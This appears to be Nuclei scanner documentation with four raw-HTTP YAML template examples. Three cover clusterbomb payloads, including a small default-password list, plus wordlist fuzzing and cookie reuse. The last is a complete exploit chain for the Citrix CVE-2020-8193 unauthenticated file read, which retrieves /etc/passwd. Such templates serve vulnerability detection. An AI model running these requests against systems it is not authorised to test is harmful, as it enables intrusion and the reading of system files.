This template makes a defined POST request in RAW format along with in template defined payloads running clusterbomb intruder and checking for string match against response.
Copy
Ask AI
id: multiple-raw-exampleinfo: name: Test RAW Template author: pdteam severity: info# HTTP Intruder fuzzing with in template payload support. http: - raw: - | POST /?username=§username§¶mb=§password§ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) Host: {{Hostname}} another_header: {{base64('§password§')}} Accept: */* body=test payloads: username: - admin password: - admin - guest - password - test - 12345 - 123456 attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb matchers: - type: word words: - "Test is test matcher text"
This template makes a defined POST request in RAW format along with wordlist based payloads running clusterbomb intruder and checking for string match against response.
Copy
Ask AI
id: multiple-raw-exampleinfo: name: Test RAW Template author: pdteam severity: infohttp: - raw: - | POST /?param_a=§param_a§¶mb=§param_b§ HTTP/1.1 User-Agent: §param_a§ Host: {{Hostname}} another_header: {{base64('§param_b§')}} Accept: */* admin=test - | DELETE / HTTP/1.1 User-Agent: nuclei Host: {{Hostname}} {{sha256('§param_a§')}} - | PUT / HTTP/1.1 Host: {{Hostname}} {{html_escape('§param_a§')}} + {{hex_encode('§param_b§'))}} attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb payloads: param_a: payloads/prams.txt param_b: payloads/paths.txt matchers: - type: word words: - "Test is test matcher text"
This template makes a subsequent HTTP requests with defined requests maintaining sessions between each request and checking for string match against response.
Copy
Ask AI
id: multiple-raw-exampleinfo: name: Test RAW Template author: pdteam severity: infohttp: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - | POST /testing HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} testing=parameter cookie-reuse: true # Cookie-reuse maintain the session between all request like browser. matchers: - type: word words: - "Test is test matcher text"
This template makes a subsequent HTTP requests maintaining sessions between each request, dynamically extracting data from one request and reusing them into another request using variable name and checking for string match against response.
Copy
Ask AI
id: CVE-2020-8193info: name: Citrix unauthenticated LFI author: pdteam severity: high reference: https://github.com/jas502n/CVE-2020-8193http: - raw: - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml X-NITRO-USER: xpyZxwy6 X-NITRO-PASS: xWXHUJ56 <appfwprofile><login></login></appfwprofile> - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.24.0 Accept: */* Connection: close - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.24.0 Accept: */* Connection: close - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.24.0 Accept: */* Connection: close - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.24.0 Accept: */* Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 rand_key: §randkey§ <appfwprofile><login></login></appfwprofile> - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.24.0 Accept: */* Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 rand_key: §randkey§ <clipermission></clipermission> cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser. extractors: - type: regex name: randkey # Variable name part: body internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" matchers: - type: regex regex: - "root:[x*]:0:0:" part: body